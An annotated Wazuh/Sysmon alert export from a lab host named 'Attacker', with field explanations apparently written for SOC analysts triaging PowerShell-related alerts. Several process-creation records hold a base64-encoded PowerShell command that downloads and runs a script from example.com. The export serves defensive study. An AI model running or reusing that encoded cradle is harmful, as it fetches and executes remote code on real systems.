Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:23.5843071Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282774
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:23.575 ProcessGuid: {94294ddc-bce6-680a-e10a-000000000e00} ProcessId: 2804 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_3s1iuxjl.0fp.ps1 CreationUtcTime: 2025-04-24 22:36:23.575 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:23.575
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bce6-680a-e10a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2804
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_3s1iuxjl.0fp.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:23.575
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell process created an executable file in Windows root folder

🧠 What happened? Powershell process created an executable file in Windows root folder

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:02.446+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:02.446+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell process created an executable file in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92205
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534222.1164343
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:24.7064061Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282787
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:24.704 ProcessGuid: {94294ddc-bcdc-680a-d70a-000000000e00} ProcessId: 13216 Image: C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Windows\SystemTemp\__PSScriptPolicyTest_qv3prkde.0h0.ps1 CreationUtcTime: 2025-04-24 22:36:24.699 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:24.704
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcdc-680a-d70a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13216
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\SystemTemp\\__PSScriptPolicyTest_qv3prkde.0h0.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:24.699
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:02.537+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:02.537+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  32
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534222.1167048
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:26.9852980Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282793
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:24.351 ProcessGuid: {94294ddc-bce8-680a-e30a-000000000e00} ProcessId: 14284 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bce6-680a-e10a-000000000e00} ParentProcessId: 2804 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:24.351
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bce8-680a-e30a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14284
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bce6-680a-e10a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  2804
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:02.552+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:02.552+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  36
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534222.1175115
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:27.2071521Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282794
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:27.162 ProcessGuid: {94294ddc-bce8-680a-e30a-000000000e00} ProcessId: 14284 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_vr2cdhun.rr0.ps1 CreationUtcTime: 2025-04-24 22:36:27.160 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:27.162
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bce8-680a-e30a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14284
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_vr2cdhun.rr0.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:27.160
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:02.884+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:02.884+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  33
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534222.1177884
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:29.5433971Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282818
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:28.213 ProcessGuid: {94294ddc-bcec-680a-e50a-000000000e00} ProcessId: 1468 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bce8-680a-e30a-000000000e00} ParentProcessId: 14284 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:28.213
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcec-680a-e50a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  1468
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

